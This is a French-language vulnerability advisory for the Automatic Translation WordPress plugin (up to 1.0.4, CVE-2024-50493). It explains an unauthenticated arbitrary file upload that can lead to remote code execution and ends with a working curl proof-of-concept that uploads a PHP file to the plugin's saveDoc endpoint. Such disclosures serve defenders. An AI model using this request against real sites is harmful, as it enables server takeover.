
Automatic Translation <= 1.0.4 - Téléchargement arbitraire de fichier non authentifié
Automatic Translation <= 1.0.4 - Téléchargement arbitraire de fichier non authentifié
Le plugin Automatic Translation pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison d'un manque de validation du type de fichier dans toutes les versions jusqu'à la version 1.0.4 inclus. Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires sur le serveur du site affecté, ce qui peut permettre l'exécution de code à distance.
CVE: CVE-2024-50493
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: automatic-translation
curl -X POST \
-F "file_name=info.php" \
-F "file_url=@/tmp/info.php" \
"http://kubernetes.docker.internal/wp-json/automatic-translator/v1/saveDoc"